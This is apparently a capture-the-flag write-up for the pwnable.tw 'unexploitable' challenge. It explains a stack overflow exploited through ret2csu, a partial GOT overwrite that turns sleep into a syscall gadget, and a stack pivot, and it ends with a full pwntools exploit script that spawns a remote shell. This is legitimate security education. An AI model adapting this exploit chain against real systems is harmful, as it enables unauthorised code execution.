Pwnable.tw: Unexploitable
unexploitable [500 pts]
The original challenge is on pwnable.kr and it is solvable.
This time we fix the vulnerability and now we promise that the service is unexploitable.
nc chall.pwnable.tw 10403
Initial Analysis
By running checksec, we can view the protections and memory corruption mitigations enabled on this binary.
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)
As we can see, the only protection enabled is NX, which means the stack is non-executable.
Let’s decompile the binary and take a look at its insides.
The binary is very simple: it sleeps for 3 seconds, then reads 256 bytes into a 16 byte buffer. The vulnerability is an obvious stack buffer overflow, and without a stack canary we can hijack program control without any leaks.
For a 500 point challenge, the binary seems deceptively simple. First and foremost, we aren’t given a lot to work with here. At first glance, there doesn’t seem to be any way to spawn a shell with so little available.
Exploitation
There are two solutions that I found to this challenge, both revolving around a similar concept. We need some means of controlling the current execution context, particularly the registers, in order to spawn a shell via execve().
The first solution involves the technique ret2csu, in which we use the gadgets present in __libc_csu_init() to gain control of the registers needed to spawn a shell. Keep in mind that this technique no longer works against binaries built with newer versions of glibc, because the function was moved into libc in glibc 2.34 under the symbol call_init. This patch removed the gadgets required for this technique from the binary.
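As a rough sketch of what a single ret2csu call looks like on the stack, the snippet below lays out the qwords by hand. The two gadget addresses are the ones used in the exploit later in this post; the register roles in the comments assume the usual __libc_csu_init layout and should be checked against the disassembly. The helper name csu_call and the address 0x601018 are hypothetical placeholders.

```python
import struct

# Addresses taken from the exploit in this post; register roles are assumed.
POP_GADGET = 0x4005E6   # assumed: add rsp, 8; pop rbx, rbp, r12, r13, r14, r15; ret
CALL_GADGET = 0x4005D0  # assumed: mov rdx, r15; mov rsi, r14; mov edi, r13d; call [r12 + rbx*8]


def csu_call(func_ptr, arg1=0, arg2=0, arg3=0):
    """Build a chain that calls *func_ptr(arg1, arg2, arg3) (hypothetical helper)."""
    qwords = [
        POP_GADGET,
        0,          # skipped by add rsp, 8
        0,          # rbx = 0, index into the call table
        1,          # rbp = 1 so the rbx + 1 == rbp check passes after the call
        func_ptr,   # r12: address of a pointer to the target, e.g. a GOT slot
        arg1,       # r13 -> edi (only the low 32 bits survive)
        arg2,       # r14 -> rsi
        arg3,       # r15 -> rdx
        CALL_GADGET,
    ]
    # After the call, execution falls back into the pop sequence:
    # one padding qword plus six popped registers.
    qwords += [0] * 7
    return struct.pack("<%dQ" % len(qwords), *qwords)


# 0x601018 is a placeholder for a GOT slot; 0x601028 is the .bss address used in this post.
chain = csu_call(0x601018, 0, 0x601028, 1024)
print(len(chain))  # 128
```

Each call costs 128 bytes of chain, which matters once the 0x100 byte read limit comes into play.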
The second solution uses sigreturn oriented programming, which exploits the signal handling mechanism by forging a fake signal frame. When a signal is delivered, the kernel saves the execution context of the running process in a signal frame on the user space stack so that the signal handler can run; sigreturn later restores the registers from that frame, so a forged frame gives us control of every register at once. A more in-depth explanation of the technique is detailed within the sigreturn oriented programming post.
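To make the idea of a forged frame more concrete, here is a minimal sketch that fills in a fake x86_64 signal frame by hand. The register offsets follow the ucontext and sigcontext layout used by Linux on x86_64; the helper name build_frame, the 248 byte frame size and the rip value are assumptions for illustration, and this is not the exploit used in this post.

```python
import struct

# Byte offsets of selected registers inside the x86_64 signal frame
# (ucontext header followed by struct sigcontext).
OFFSETS = {
    "rdi": 0x68, "rsi": 0x70, "rbp": 0x78, "rbx": 0x80, "rdx": 0x88,
    "rax": 0x90, "rcx": 0x98, "rsp": 0xA0, "rip": 0xA8, "eflags": 0xB0,
    "csgsfs": 0xB8,
}
FRAME_SIZE = 31 * 8  # assumed: covers every field up to and including the signal mask


def build_frame(**regs):
    """Return a zeroed frame with the given registers filled in (hypothetical helper)."""
    frame = bytearray(FRAME_SIZE)
    regs.setdefault("csgsfs", 0x33)  # cs selector for 64-bit user mode code
    for name, value in regs.items():
        struct.pack_into("<Q", frame, OFFSETS[name], value)
    return bytes(frame)


# rax = 59 (execve) and rdi = the .bss address holding "/bin/sh" come from this post;
# rip = 0x400000 is a placeholder for an address that ends up executing syscall.
frame = build_frame(rax=59, rdi=0x601028, rsi=0, rdx=0, rip=0x400000)
print(len(frame))
```

The frame only takes effect once rt_sigreturn (syscall number 15 on x86_64) runs with the stack pointer at the forged frame, so this approach still needs control of rax and a way to reach a syscall instruction.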
Our next problem is that we don’t have a syscall gadget, nor do we have any obvious means of setting the rax register to our desired value of 59 (execve).
In the x86_64 ABI, the ax register (and its extended forms, eax and rax) serves multiple purposes. One of them is holding the return value of each executed routine. If we can hijack program control, then we can populate the rax register with whatever value we want simply by calling a function whose return value we control.
The following is a snippet from the man page for the read system call.
RETURN VALUE
Upon successful completion, these functions shall return a non-negative
integer indicating the number of bytes actually read. Otherwise, the
functions shall return -1 and set errno to indicate the error.
By leveraging the read import, we can gain control of the rax register: the number of bytes we send determines the value that read returns.
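The return value behaviour is easy to confirm outside of the challenge. The following is a small sketch using a local pipe rather than the remote service; the helper name bytes_returned_by_read is hypothetical.

```python
import os


def bytes_returned_by_read(payload, max_len=1024):
    """Write payload into a pipe and report how many bytes one read() returns."""
    read_fd, write_fd = os.pipe()
    try:
        os.write(write_fd, payload)
        data = os.read(read_fd, max_len)
    finally:
        os.close(read_fd)
        os.close(write_fd)
    return len(data)


print(bytes_returned_by_read(b"A" * 59))  # 59
print(bytes_returned_by_read(b"B"))       # 1
```

Over a network socket the data can arrive in several pieces, so a single read is not guaranteed to return everything that was sent; short payloads sent in one call are the safer choice.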
We also need a reference to whichever binary we want to execute, which in this case is /bin/sh\x00. This can be achieved simply by reading the string into a writeable section of memory and passing that address to execve.
Our last problem is that of the syscall gadget, as one isn’t present within the binary. However, notice that Full RELRO is not enabled, which means the global offset table is writeable. Despite ASLR being enabled, libraries are always mapped at addresses aligned to 0x1000, meaning that the three least significant nibbles of any libc address will always be fixed.
Because the GOT entries of imported symbols are populated lazily at runtime with addresses inside libc, we can partially overwrite an entry so that it points to another instruction close to that symbol in libc. Let’s take a look at the surrounding instructions in the libc provided to us and see if we can find a syscall instruction. I chose the sleep import as the entry to overwrite; it is already resolved by the time we gain control, since main calls sleep before read.
To do so, we search the instructions that we can reliably reach with a partial overwrite. First, we find the address of sleep within libc.
[0x000cb680]> pd 1 @sym.sleep
; CALL XREF from sym.argp_error @ +0x205(x)
; CALL XREF from sym.rcmd_af @ 0x11d49b(x)
; CALL XREF from sym.rexec_af @ 0x11e124(x)
┌ 68: int sym.sleep (int s);
│ rg: 1 (vars 0, args 1)
│ bp: 0 (vars 0, args 0)
│ sp: 1 (vars 1, args 0)
│ 0x000cb680 55 push rbp
[0x000cb680]>
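So we now know that the low 12 bits of the resolved address are always 0x680. Overwriting a single byte therefore lets us reliably redirect the entry to any instruction within the range 0x000cb600-0x000cb6ff; reaching the rest of the 0x000cb000-0x000cbfff page would require overwriting a second byte, whose upper nibble is randomized by ASLR. By searching for instructions within this range, I chose the syscall gadget at the address 0x000cb655. So by overwriting the least significant byte of the sleep GOT entry with \x55, we effectively gain the ability to invoke system calls.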
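The arithmetic behind the one byte overwrite can be checked with a short sketch. The two offsets are the ones quoted in this post; the libc base addresses are random, hypothetical, page-aligned values and the helper name overwrite_low_byte is made up for illustration.

```python
import random

SLEEP_OFFSET = 0x0CB680    # sym.sleep in the provided libc
SYSCALL_OFFSET = 0x0CB655  # syscall gadget chosen in this post


def overwrite_low_byte(pointer, new_byte):
    """Model a one byte write to the least significant byte of a little-endian pointer."""
    return (pointer & ~0xFF) | new_byte


for _ in range(1000):
    # Hypothetical page-aligned libc base, as ASLR would pick one.
    base = random.randrange(0x7F0000000000, 0x7FFFFFFFF000, 0x1000)
    got_sleep = base + SLEEP_OFFSET
    patched = overwrite_low_byte(got_sleep, 0x55)
    assert patched == base + SYSCALL_OFFSET

print("the patched entry points at the syscall gadget for every sampled base")
```

Whatever base the loader picks, the patched pointer lands on the gadget, which is why no leak is needed.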
Keep in mind that when debugging this locally, if you are not loading the binary with the provided libc, you will have to update the offset to point to a syscall instruction in whichever libc you are using.
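One way to find a replacement byte for a different libc is to scan for the syscall opcode (0f 05) in the 256 byte window that shares everything but the low byte with the symbol. The sketch below works on raw bytes and assumes that file offsets equal virtual offsets for the code in question, which should be verified for the libc at hand; the helper name syscall_candidates and the synthetic test data are hypothetical.

```python
SYSCALL_OPCODE = b"\x0f\x05"


def syscall_candidates(libc_bytes, symbol_offset):
    """Return offsets of 0f 05 that differ from symbol_offset only in the low byte."""
    window_start = symbol_offset & ~0xFF
    window_end = window_start + 0x100
    hits = []
    pos = libc_bytes.find(SYSCALL_OPCODE, window_start)
    while pos != -1 and pos < window_end:
        hits.append(pos)
        pos = libc_bytes.find(SYSCALL_OPCODE, pos + 1)
    return hits


# Synthetic stand-in for a libc image: one hit inside the window, one outside.
blob = bytearray(0x1000)
blob[0x655:0x657] = SYSCALL_OPCODE
blob[0x7A0:0x7A2] = SYSCALL_OPCODE

hits = syscall_candidates(bytes(blob), 0x680)
print([hex(h) for h in hits])          # ['0x655']
print([hex(h & 0xFF) for h in hits])   # ['0x55']
```

With a real library, the bytes would come from reading the libc file and the symbol offset from its symbol table. A hit is only useful if the instructions after it return cleanly, so each candidate still needs to be checked in a disassembler.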
I chose to use the ret2csu technique. The full exploit code is provided below.
#!/usr/bin/env python3
from pwn import *
from sys import argv
from time import sleep

binary = ELF('unexploitable', checksec=0)
libc = ELF('libc_64.so.6', checksec=0)
context.arch='amd64'
context.log_level='DEBUG'

# Pass -r to target the remote service, otherwise run the binary locally
r=False
if len(argv) >= 2 and argv[1] == '-r':
    r=True
    p = remote('chall.pwnable.tw', 10403)
else:
    p = binary.process(env={})

s = lambda x, r="" : \
    p.sendafter(r, x) if r else p.send(x)
sl = lambda x, r="" : \
    p.sendlineafter(r, x) if r else p.sendline(x)

# ret2csu: gadget 1 pops the registers, gadget 2 moves them into the
# argument registers and calls the function pointer stored at f
csu_gadget_1 = 0x004005e6
csu_gadget_2 = 0x004005d0
csu_chain = lambda f, a1=0, a2=0, a3=0 : \
    flat(csu_gadget_1, 0, 0, 1, f, a1, a2, a3, csu_gadget_2) + p64(0)*7

offset=24
bss_section=0x00601028

pause()

# Stage 1: read the second stage into .bss, then pivot the stack there
payload = b'A'*offset # fill the buffer and the saved base pointer
payload += csu_chain(binary.got['read'], 0, bss_section, 1024)
payload += p64(0x0000000000400512) # pop rbp ; ret
payload += p64(bss_section)
payload += p64(0x0000000000400576) # leave ; ret

log.info("sleep(3)")
sleep(3)
log.info("Sending payload 1")
p.send(payload)

# Stage 2: after the pivot, leave pops the /bin/sh string into rbp
payload2 = b'/bin/sh\x00'
# read(0, sleep@got, 1): patch the low byte of sleep@got, leaves rax = 1
payload2 += csu_chain(binary.got['read'], 0, binary.got['sleep'], 1)
# sleep@got now reaches syscall: write(1, bss, 59) leaves rax = 59
payload2 += csu_chain(binary.got['sleep'], 1, bss_section, 59)
# execve("/bin/sh", 0, 0)
payload2 += csu_chain(binary.got['sleep'], bss_section, 0, 0)
p.send(payload2)

sleep(1)
# Low byte of the syscall gadget: \x55 for the provided libc, \xb9 for my local libc
p.sendline(b'\x55' if r else b'\xb9')
p.interactive()
Conclusion
Something to keep in mind is that the initial read within main only allows us to read 0x100 bytes into the local buffer. With ret2csu, it is very easy to craft ROP chains that are larger than this read. We can circumvent this with a stack pivot to any readable and writeable region of memory at a known address; I chose to use the .bss section.
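A quick size budget shows why the pivot is needed. The numbers below are derived from the exploit in this post (24 bytes of padding, 16 qwords per ret2csu call, a three qword pivot); the constant names are made up for illustration.

```python
QWORD = 8
CSU_CALL_SIZE = 16 * QWORD   # 9 qwords of setup plus 7 qwords consumed after the call
PADDING = 24                 # bytes before the saved return address
PIVOT_SIZE = 3 * QWORD       # pop rbp ; ret, new rbp value, leave ; ret
MAIN_READ_LIMIT = 0x100      # size of the read in main
STAGE2_READ_LIMIT = 1024     # size requested by the stage 1 read into .bss

# Stage 1: padding, one call to read, then the pivot
stage1 = PADDING + 1 * CSU_CALL_SIZE + PIVOT_SIZE
# Stage 2: the /bin/sh string followed by three calls
stage2 = len(b"/bin/sh\x00") + 3 * CSU_CALL_SIZE
# Everything in one shot: padding plus four calls, no pivot
single_shot = PADDING + 4 * CSU_CALL_SIZE

print(stage1, stage1 <= MAIN_READ_LIMIT)            # 176 True
print(stage2, stage2 <= STAGE2_READ_LIMIT)          # 392 True
print(single_shot, single_shot <= MAIN_READ_LIMIT)  # 536 False
```

Splitting the chain keeps the first stage under the 0x100 byte limit while the second stage is free to use the larger read.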
Thanks for reading \(≧▽≦)/ !!